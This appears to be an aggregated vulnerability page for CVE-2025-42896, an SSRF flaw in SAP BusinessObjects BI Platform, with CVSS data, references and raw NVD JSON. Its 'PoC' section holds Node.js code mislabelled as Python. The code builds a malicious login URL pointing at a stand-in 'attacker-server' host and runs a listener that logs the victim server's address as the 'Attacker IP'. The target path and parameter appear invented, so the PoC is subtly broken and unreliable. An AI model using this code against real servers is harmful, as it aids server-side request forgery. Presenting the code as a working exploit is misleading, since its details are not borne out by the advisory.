CVE-2025-42896

Description

SAP BusinessObjects Business Intelligence Platform lets an unauthenticated remote attacker send crafted requests through the URL parameter that controls the login page error message. This can cause the server to fetch attacker-supplied URLs, resulting in low impact to confidentiality and integrity, and no impact to availability.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP BusinessObjects Business Intelligence Platform (具体版本需参考SAP官方安全公告3651390)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-42896 SSRF PoC for SAP BusinessObjects BI Platform
// This PoC demonstrates how an attacker can inject a malicious URL
// through the error message parameter to trigger server-side request forgery

const http = require('http');

// Attacker-controlled server to receive SSRF requests
const attackerServer = http.createServer((req, res) => {
    console.log('[+] Received request from victim server');
    console.log('[+] Request URL:', req.url);
    console.log('[+] Request Headers:', req.headers);
    
    // Log request details for analysis
    const clientIP = req.connection.remoteAddress;
    console.log(`[+] Attacker IP: ${clientIP}`);
    
    // Send response to victim server
    res.writeHead(200, {'Content-Type': 'text/html'});
    res.end('SSRF Test Response');
});

attackerServer.listen(8080, () => {
    console.log('[*] Attacker server listening on port 8080');
});

// Simulated attack URL pattern
// The attacker would craft a URL like:
// https://target-sap-server/BOE/logon.aspx?errorMsg=http://attacker-server:8080/malicious-endpoint
// 
// The errorMsg parameter is exploited to trigger SSRF
// Server will fetch the attacker-controlled URL, leaking internal information

// Example malicious URL construction
const targetBaseUrl = 'https://sap-boserver.example.com';
const attackerUrl = 'http://attacker-server:8080/internal-api';
const maliciousUrl = `${targetBaseUrl}/BOE/logon.aspx?errorMsg=${encodeURIComponent(attackerUrl)}`;

console.log(`[*] Malicious URL: ${maliciousUrl}`);
console.log('[*] Social engineering required to trick user into visiting this URL');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-42896
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-42896
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-42896/
[4] VulDB https://vuldb.com/cve/CVE-2025-42896
[5] https://me.sap.com/notes/3651390
[6] https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-42896", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:52.787", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP BusinessObjects Business Intelligence Platform lets an unauthenticated remote attacker send crafted requests through the URL parameter that controls the login page error message. This can cause the server to fetch attacker-supplied URLs, resulting in low impact to confidentiality and integrity, and no impact to availability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-116"}]}], "references": [{"url": "https://me.sap.com/notes/3651390", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}